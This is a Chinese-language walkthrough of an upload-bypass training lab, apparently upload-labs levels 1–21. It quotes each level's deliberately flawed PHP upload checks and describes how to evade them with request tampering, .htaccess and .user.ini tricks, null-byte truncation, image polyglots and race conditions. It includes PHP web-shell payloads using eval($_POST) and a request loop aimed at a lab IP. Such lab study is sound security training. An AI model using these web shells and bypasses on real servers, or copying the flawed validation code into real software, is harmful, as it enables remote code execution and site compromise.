pass-1:前端验证
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//lastIndexOf() 方法返回字符串中指定值最后一次出现的索引(下标)。 当参数只有一个时则从该参数向后截取
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
//判断文件后缀是否合法
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
这个函数使用的是JS前端代码,有两个方法绕过:
1、直接关闭js功能
2、将木马后缀修改为合法后缀,再使用burp抓包,该为正确后缀。
pass-2:MIME验证
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
mime在请求头中为content-type,此时有两个方法可以进行绕过
1、正常上传木马,用burp抓包,修改请求头中的content-type类型
2、修改木马后缀,用burp抓包,修改请求头中的后缀
常见mime类型:
HTML文档标记:text/html;
普通ASCII文档标记:text/html;
JPEG图片标记:image/jpeg;
GIF图片标记:image/gif;
js文档标记:application/javascript;
xml文件标记:application/xml;
png图: image/png
pass-3:过滤.asp|.aspx|.php|.jsp后缀文件
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
//检查一个名为 UPLOAD_PATH 的文件或目录是否存在
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
//函数trim用于去除字符串的空格,防止空格绕过
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');//strrchr() 函数查找$file_name在"."中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符。
$file_ext = strtolower($file_ext); //转换为小写,防止大小写绕过
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
//判断$file_ext是否在$deny_ext中
$temp_file = $_FILES['upload_file']['tmp_name'];
//$_FILES['myFile']['tmp_name'] 文件被上传后在服务端储存的临时文件名,一般是系统默认。
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
方法:把一句话木马的后缀php改为phtml、phtm、PHP5、PHP3等中的一种
在嵌入了php脚本的html中,使用 phtml作为后缀名;完全是php写的,则使用php作为后缀名。这两种文件,web服务器都会用php解释器进行解析。
参考资料:phpstudy的apache服务器无法解析运行以.php5,.phtml等非.php后缀的文件的解决方法_php显示fcgidinitialenv无效-CSDN博客
pass-4:.htaccess文件上传
禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件!
方法:创建一个.htaccess文件(文件名就为.htaccess)内容如下:
AddType application/x-httpd-php aaa.png #这里的aaa.png是上传的木马的文件名
或
<FilesMatch 'aaa.jpg'>
SetHandler application/x-httpd-php
</FilesMatch>
等。。。
.htaccess文件是一种配置文件,在这里可以使得png文件以php语言编码
再上传一个名为aaa.png的木马文件即可
pass-5:use.ini文件绕过/点加空格加点绕过
源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
法一:
上传一个.user.ini文件,内容为:
auto_perpend_file=aaa.txt
再上传一个名为aaa.txt的木马文件,访问readme.php文件
法二:
上传一个木马文件aaa.php,抓包,在后缀加上一个. .(点空格点),直接访问
原理:按照源码逻辑去除一个点和一个空格,获得的后缀为空,不在黑名单中,于是文件得以传输进去。
pass-6:大小写绕过
源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
对比上一关源码发现少了一个后缀转换大小写
方法:上传木马文件aaa.PHp
后端代码绕过
pass-7:空格绕过
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
对比第五关,源码少了一个trim去空
方法:上传aaa.php木马,抓包,在文件名后面加一个空格
pass-8:后缀加点绕过
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
对比第五关,源码少了一个去点函数deldot
方法:上传aaa.php木马,抓包,文件名后面加个点
pass-9:额外数据流绕过
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = trim($file_ext); //首尾去空
对比第五关,少了去除额外数据流::$DATA
方法:上传木马文件aaa.php 抓包 在文件名后面加上::$DATA ,访问上传的文件,去掉::$DATA
pass-10:点空格点绕过
方法:上传木马文件aaa.php 抓包 在文件名后面加上. .
pass-11:双写绕过
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
//将与$deny_ext中的字符串相匹配的字符串替换成空
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
关键函数:str_ireplace($deny_ext,"", $file_name);
方法:上传木马aaa.php 抓包 将文件名改为aaa.pphphp
pass-12:空字符截断%00
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
//substr(a, b [,c] ) a为作用字符串,b为起始位置,c为结束位置,函数将字符串a从b截断[到c]
//strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
前提条件:1、php版本要低于5.3.4
2、php.ini中的magic_quotes_gpc设置为Off
方法:
上传木马aaa.png 抓包 修改参数 $save_path 将其后面加上aaa.php%00 访问上传文件 删除后面的png文件
pass-13:空字符截断0x00
源码和pass-12几乎相同,参数$save_path由get改为post
方法:
上传木马aaa.png 抓包 更改$save_path为 ../upload/aaa.php
这里要在这个值后面加一个空格,再选中这个空格,右侧将Code改为HEX值00
访问上传文件,将jpg文件删掉
pass-14:文件头字节编码绕过/文件包含
Jpg格式图片的文件头标识:FFD8开头FFD9结尾
Png格式图片的文件头标识:89 20 4E 47 0D 0A
Gif格式图片的文件头标识:GIF89a GIF87a
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
思路:文件马制作 -> 上传图片马 -> 包含木马文件
方法:
1、这一关只验证了前两个字节,于是可以想到改变图片的内容,只保留头两个字节。如图,
步骤:用010打开一个正常的jpg/png/gif图片,把前两个字节之后的所有字节全部删除,改为一句话木马,保存。 上传改文件,在文件包含中利用。
2、可以直接在bp包的文件内容加上GIF89a或GIF87a
利用文件包含,成功访问
pass-15:图片马上传getimagesize()/文件包含
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
关键函数:getimagesize()这个函数返回一个包含图像信息的数组。依次为宽度、高度、图像类型的常量值(可以使用image_type_to_extension()函数将其转换为MIME类型)、包含图像属性的字符串
方法:Windows命令copy制作图片马,文件包含引用。
pass-16:图片马绕过exif_imagetype()/文件包含
function isImage($filename){
//需要开启php_exif模块
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
关键函数:exif_imagetype() 读取一个图像的第一个字节并检查其签名。(检查文件后缀,和上一关差不多,不同的)
方法:和上一关相同
函数exif_imagetype()和getimagesize()的区别:getimagesize()这个函数返回一个包含图像信息的数组。依次为宽度、高度、图像类型的常量值(可以使用image_type_to_extension()函数将其转换为MIME类型)、包含图像属性的字符串。而exif_imagetype()直接检查文件后缀,速度更快
pass-17:二次渲染
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}
关键函数:imagecreatefromjpeg()用于重写图像文件
思路:获取重写文件与原来文件中相同的部分,将木马写入其中,即可生成木马文件(png文件二次渲染后的部分太少了,建议使用jpg文件或gif文件)
方法:
上传一个正常图片文件,最好是gif文件
获取服务器中的这个图片文件。 打开010editor,在右上角找到compare files(CTRL+m),选择原来的文件与上传后的文件,点击下面的match功能(蓝色的部分代表的是未改变的部分),在未被更改的部分中插入一句话木马(最好是放在较为后面的位置)
将插入一句话木马的jpg文件上传,利用文件包含漏洞成功访问
ps:部分gif文件可能会失败,原因是其引入了php文件后可能存在编码后作为php的非法语法导致
pass-18:条件竞争绕过
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
//临时路径
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
//保存路径
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}
这一关的文件上传将先创建一个临时目录,将文件上传至临时目录中(此时文件已经进入了服务器),但是验证不通过则会直接删除
思路:使用工具不断上传大马,同时访问,如果访问到即可生成小马,而这个小马不会被删除
方法:制作一个大马(dama.php)
<?php fputs(fopen('../upload/shell1.php','w'),'<?php @eval($_POST["x"]);?>');?>
利用burp不断上传这个dama.php(上传dama.php->抓包 ->发送到intruder->payload选择无null payload->发送)
上传dama.php的同时,访问这个dama.php(访问->抓包->发送到intruder->payload选择null payload->发送)
或者使用python访问:
import requests
url = "http://192.168.175.138:81/upload/dama.php"
while True:
html = requests.get(url)
if (html.status_code==200):
print('ok')
break
else:
print("发包中")
pass-19:apache解析漏洞+条件竞争
前置:开始时上传图片发现图片保存位置在upload上一级文件夹里,审计代码后发现保存目录的函数有问题
把函数setDir中选中的部分改成图中的样子就行了
apache特性:网站读取文件时将文件名从后往前读,如果后面的那个后缀不认识,那就会继续往前面读取
源码分析:在上一关,上传文件时服务器将先接收文件,并将其当作临时文件存入,同时检测后缀,如果后缀合法,则保留,若不合法则删除。但是这一关,服务器将先检查后缀,如果不合法,则不会存入服务器,若合法则会先将其存入服务器,同时进行重命名
思路:若传入后缀合法文件,而这个后缀apache服务不认识,访问时读取这个后缀前的后缀,如(dama.php.7z),这时一般来说服务器将先将其存入服务器,再同时将这个文件改名为时间戳+7z,而改名之前由apache读取出来是dama.php
方法:创建dama.php
<?php fputs(fopen('../upload/shell.php','w'),'<?php @eval($_POST["aaa"])?>');?>
1、上传 抓包 将dama.php改为dama.php.7z 发送到intruder模块
2、访问 192.168.175.138:81/upload/dama.php.7z 抓包 发送到intruder模块
选择null payload发送无数次(两个都是)
先开始访问192.168.175.138:81/upload/dama.php.7z
再上传dama.php.7z
(亲测必须是这个步骤,不然生成不了)
发现shell.php生成成功
访问
成功!
pass-20:后缀绕过总结
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
//pathinfo()获得字符串最后一个点之后的所有内容
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
1、user.ini绕过
2、后缀加点/点空格/点空格点/点杠
3、%00或0x00
pass-21:数组后缀绕过
if(!empty($_FILES['upload_file'])){
//检查MIME
$allow_type = array('image/jpeg','image/png','image/gif');
if(!in_array($_FILES['upload_file']['type'],$allow_type)){
$msg = "禁止上传该类型文件!";
}else{
//检查文件名
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
if (!is_array($file)) {
$file = explode('.', strtolower($file));
//将文件名在 . 处分割为数组
}
$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$msg = "禁止上传该后缀文件!";
}else{
$file_name = reset($file) . '.' . $file[count($file) - 1];
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$msg = "文件上传成功!";
$is_upload = true;
} else {
$msg = "文件上传失败!";
}
}
}
}else{
$msg = "请选择要上传的文件!";
}
源码分析:
上传文件后,服务器首先将检查文件的MIME类型
然后使用一个三元运算符判定文件名,并将文件名以 . 分割为数组
取数组的最后一位判断是否为合法后缀
将文件以数组第一位+数组位数减一位为名保存
方法:上传一句话木马aaa.php
抓包
修改content-type
将content-disposition改为数组,如图:
这里的save_name[0]必须以php结尾
最后一个save_name[]必须为合法后缀
访问(去掉后面的.)
成功!